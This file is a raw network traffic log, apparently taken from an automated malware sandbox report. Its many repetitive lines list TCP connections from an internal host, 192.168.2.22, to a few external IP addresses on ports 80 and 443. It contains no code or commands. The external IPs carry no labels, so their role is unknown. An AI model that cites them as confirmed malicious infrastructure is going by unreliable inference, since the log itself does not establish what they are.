                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 150.171.41.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.107.137.11:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49165
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 94.156.67.72:80
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
                  Source: global trafficTCP traffic: 94.156.67.72:80 -> 192.168.2.22:49169
